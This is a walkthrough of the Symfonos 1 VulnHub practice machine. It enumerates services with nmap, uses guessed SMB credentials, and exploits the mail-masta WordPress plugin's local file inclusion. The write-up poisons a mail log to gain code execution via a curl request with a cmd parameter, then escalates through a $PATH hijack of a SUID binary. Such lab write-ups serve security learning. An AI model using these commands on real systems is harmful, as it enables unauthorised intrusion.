SYMFONOS 1 Walkthrough — VulnHub — Story of a Shimmering God with Bad Habits —OSCP Practice

Symfonos 1 is the first machine of a group of OSCP like VMs listed on NetSecFocus doc, In this writeup we will practice gaining foothold with SMTP and the escalating the privilege to root with PATH injection. Symfonos 1 is a fun VM based on real life situations and one can learned alot with it if dig deep enough!

Preparation

  1. Download Symfonos 1 from VulnHub and bootup in VMware or Virtualbox
  2. Your favorite haxor env, in this article I am using a Kali VM
  3. Find IP address of Development one way to do it is with namp
nmap -sn 172.16.30.0/24

In this case my IP is 172.16.30.4

Tools

  • nmap
  • gobuster
  • smbclient
  • wpscan
  • nc
  • strings

Topics

  • LFI (Local File Inclusion)
  • SMTP (25) mail (log) poisoning following LFI
  • SUID binary
  • $PATH exploitation following SUID binary

Enumeration

# Nmap 7.91 scan initiated Sat Feb 13 02:35:30 2021 as: nmap -p- -sC -sV -T4 -v -o tcp.nmap 172.16.30.4
Nmap scan report for 172.16.30.4
Host is up (0.0019s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-29T00:29:42
| Not valid after: 2029-06-26T00:29:42
| MD5: 086e c75b c397 34d6 6293 70cd 6a76 c4f2
|_SHA-1: e3dc 7293 d59b 3444 d39a 41ef 6fc7 2006 bde4 825f
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m50s, median: 0s
| nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS<00> Flags: <unique><active>
| SYMFONOS<03> Flags: <unique><active>
| SYMFONOS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2021-02-12T18:35:46-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-13T00:35:46
|_ start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 13 02:35:46 2021 -- 1 IP address (1 host up) scanned in 15.92 seconds
  • Port 22 is open for da best, so can ssh when the time comes!
  • Port 25 (smtp) is open, runnign Postfix mailserver that sends email!
  • Port 80 is open, will check with browser
  • Ports 139 and 445 are open for samba

Port 80 returns a picture and some css

Running gobuster

gobuster dir -u http://symfonos.local/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php" -o gobuster

Nothing interesting

Enumerating smb that gives us anonymous account and another account called helios

Anonymous has a txt file giving us some passwords (epidioko, qwerty, baseball) to try

smbclient -L \\\\172.16.30.4\\
smbclient \\\\172.16.30.4\\anonymous

After testing to login to smb with helios user and those password qwerty worked and two files available!

the third todo is to work on /h3l105 , such 1337 l0c4t10n :) trying on browser!
Its a wordpress site, we need to add symfonos.local to host file to see it correctly.

binwalk-ed both images from index and wordpress and nothing, hiding data in images is not really a real world pentesting situation and more of CTF competition but just for not leaving any stone unturned!

Running WPscan

wpscan --url http://symfonos.local/h3l105 -o wpscan

wpscan needs an api token to show us the vulnerabilities related to findings but I just googled the version of wp and the founds pluggings

There are a bunch of vulns for wordpress 5.2.2 but some are authenticated which is not interesting now but there is a old discontinued plugin for wordpress called mail-masta that has LFI adn SQL injections

https://wpscan.com/vulnerability/5136d5cf-43c7-4d09-bf14-75ff8b77bb44
https://wpscan.com/vulnerability/c992d921-4f5a-403a-9482-3131c69e383a

So LFI is working on passwd

At this point tried to fetch some sensitive files with LFI but failed like wp configs, logs and feels like a dead end, end up searching about ways to escalate LFI to ICE

So we can invoke RCE with log files and also mail and many other ways

Its not possible to read /var/log/mail but after searching foud that postfix save emails for a user at /var/mail/[USER]

And it works mails for helios user comes back

curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php\?pl\=/var/mail/helios

There are couple emails too, so if we inject a php code in email logs (poisoning) and call it from web the vulnerable php file execute it

now how to send an email to an open smpt (25) port, for that we need to have a existing email address in that email server, we do, its the user name that is helios

Read more about workign with SMTP port here, here and here.

I wrote from and to in the Data section too but its not necessary in this case but its a good practice to keep it low profile and normal in general!

nc is available o nserver so just got it

curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php\?pl\=/var/mail/helios\&cmd\=ls

Shell is with helios account, after upgrading the shell did enumeration with (lse.sh) and there is a binary file at /opt/statuscheck with SUID bit set.

After running it seems like its running curl to check status of web the date is current, first thing to analyse a static file is to pass it thorugh strings command!

Our guess was true seems like its running curl agains localhost
a lesson here for coding is that when need to use a system command tp use absolute path, in here curl is not using its absolute path of its binary which is in /usr/bin/curl instead just calling curl in this case linux find the path of the curl from environment variable $PATH so

Lets escalate the privilege using $PATH by creating a fake curl in /tmp and put /tmp in $PATH so script run it instead of original curl

Notice the difference between uid and euid also notice that if we pass /bin/bash to our new curl it returns the normal user not root but it returns root with /bin/sh it can be because how the SUID file /opt/statuscheck programmed to use /bin/sh

  • read more about uid and euid here

Post Exploitation

Looked around for the source of statuscheck but couldnt find it, would be nice to confirm exactly why root shell doesn’t return with /bin/bash, maybe I will update this later

Also there is a flag in /root if interested :)

Helios did a few mistakes that lead us to pwn this machine, the obvious first one is buddy wordpress plugin and the one that gives us root is usage of curl without absolute path, the lesson to learn here is that if you using an external tool in your code call it with absolute pass like /usr/bin/curl and not just curl

Conclution

Symfonos 1 was a fun vm and it was a good refresher about debugging mail and smtp for me also learned alot about different ways to escalate LFI to RCE

Hope you enjoyed it too!

Breaking stuff to learn them, learning stuff to break them!